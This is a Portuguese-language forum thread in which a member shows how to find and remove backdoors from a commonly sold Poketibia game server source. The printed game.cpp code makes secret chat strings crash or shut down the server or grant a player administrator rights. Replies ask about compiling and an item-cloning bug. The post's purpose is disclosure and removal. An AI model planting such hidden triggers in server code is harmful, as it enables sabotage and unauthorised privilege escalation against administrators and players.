Ir para conteúdo

Featured Replies

Postado
4 minutos atrás, Alexy Brocanello disse:

pode deixar, vou trazer sim!

Se você conseguisse trazer á solução do OPCODE DA DXP, pq tem algo no OPCODE Que Permite clonar itens.

Cada escolha, uma oportunidade.
Cada queda, um aprendizado.
Cada atitude, uma consequência

 

.tumblr_nw2mfl0ut01r3aoszo1_400.gif

  • Respostas 41
  • Visualizações 5.6k
  • Created
  • Última resposta

Top Posters In This Topic

Most Popular Posts

  • Pelo estilo de código merda, eu até consigo imaginar quem que fez isso, kkkkkkkkkk.

  • opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!    

  • vou investigar esses clones ai, obrigado por me lembrarem, irei verificar o motivo dos clones.

Postado
Em 15/12/2016 ás 11:23, Alexy Brocanello disse:

Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava um cargo de administrador a um jogador com groups 1. Então me falaram que esse código era no game.cpp, portanto olhei linha por linha nessa source que está espalhada em vários fóruns e não é só aqui, é praticamente um código colocado por mal gosto, para ferrar praticamente com a vida de novos administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará da SOURCES do seu Poketibia para fazer essa verificação, caso possua o código da "morte" peço que siga o tutorial abaixo.

 

ACHE em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso)

 

Código 1


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}
	
	if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
    {
	exit(0);
    }
	
	if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
    { 
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Etapa do Código 1 Mude para:

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Pronto agora é só compilar sua source! Fiz update e achei outro código de derrubar no DXP.

 

Código 2

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);
		
		int specs = 31101996;
		std::string findText;
		std::stringstream findTextInput;
		findTextInput << specs;
		findText = findTextInput.str();
		bool exists = text.find(findText) != std::string::npos;
		if(exists){
           Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
		   return true; 
        }

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Código 2, mude para 

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

 

 

 

Logo mais revelo novo código da mortes, créditos a mim, e cipsoft pelo código original.

 

cara eu comecei a mexer com poketibia esse ano certamente que sou um otadmin ainda pois nao sei muita coisa mais todos os dias procuro estudar sistemas scripts e ja aprendi bastante coisa ao longo do tempo :) uma coisa que to me aventurando agora e tentar aprender compilar uma sourcer sera que voce pode me dizer como faço tal façanha ? ou poderia me passar um link que ensine obrigado Rep+

Postado
  • Autor
  • Diretor
1 minuto atrás, Punchlines Nemmo disse:

cara eu comecei a mexer com poketibia esse ano certamente que sou um otadmin ainda pois nao sei muita coisa mais todos os dias procuro estudar sistemas scripts e ja aprendi bastante coisa ao longo do tempo :) uma coisa que to me aventurando agora e tentar aprender compilar uma sourcer sera que voce pode me dizer como faço tal façanha ? ou poderia me passar um link que ensine obrigado Rep+

opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!

 

 

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

Postado
Agora, Alexy Brocanello disse:

opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!

 

 

vlw me ajudou bastante :) e sobre a sourcer da dxp eu vi que tem um erro bastante chato e tals que permite que o player clonar itens sera que voce poderia dar uma olhada nele ? e que meu projeto ta na dxp :D mais msm assim vlw msm pela força

  • 2 months later...
Postado
Em 15/12/2016 ás 10:23, Alexy Brocanello disse:

Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava um cargo de administrador a um jogador com groups 1. Então me falaram que esse código era no game.cpp, portanto olhei linha por linha nessa source que está espalhada em vários fóruns e não é só aqui, é praticamente um código colocado por mal gosto, para ferrar praticamente com a vida de novos administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará da SOURCES do seu Poketibia para fazer essa verificação, caso possua o código da "morte" peço que siga o tutorial abaixo.

 

ACHE em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso)

 

Código 1


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}
	
	if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
    {
	exit(0);
    }
	
	if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
    { 
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Etapa do Código 1 Mude para:

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Pronto agora é só compilar sua source! Fiz update e achei outro código de derrubar no DXP.

 

Código 2

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);
		
		int specs = 31101996;
		std::string findText;
		std::stringstream findTextInput;
		findTextInput << specs;
		findText = findTextInput.str();
		bool exists = text.find(findText) != std::string::npos;
		if(exists){
           Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
		   return true; 
        }

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Código 2, mude para 

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

 

 

 

Logo mais revelo novo código da mortes, créditos a mim, e cipsoft pelo código original.

 

Esqueceu de citar o payordown Tbm ^^ 

 

Participe da conversa

Você pode postar agora e se cadastrar mais tarde. Se você tem uma conta, faça o login para postar com sua conta.

Visitante
Responder

Quem Está Navegando 0

  • Nenhum usuário registrado visualizando esta página.

Estatísticas dos Fóruns

  • Tópicos 96.9k
  • Posts 519.7k

Informação Importante

Confirmação de Termo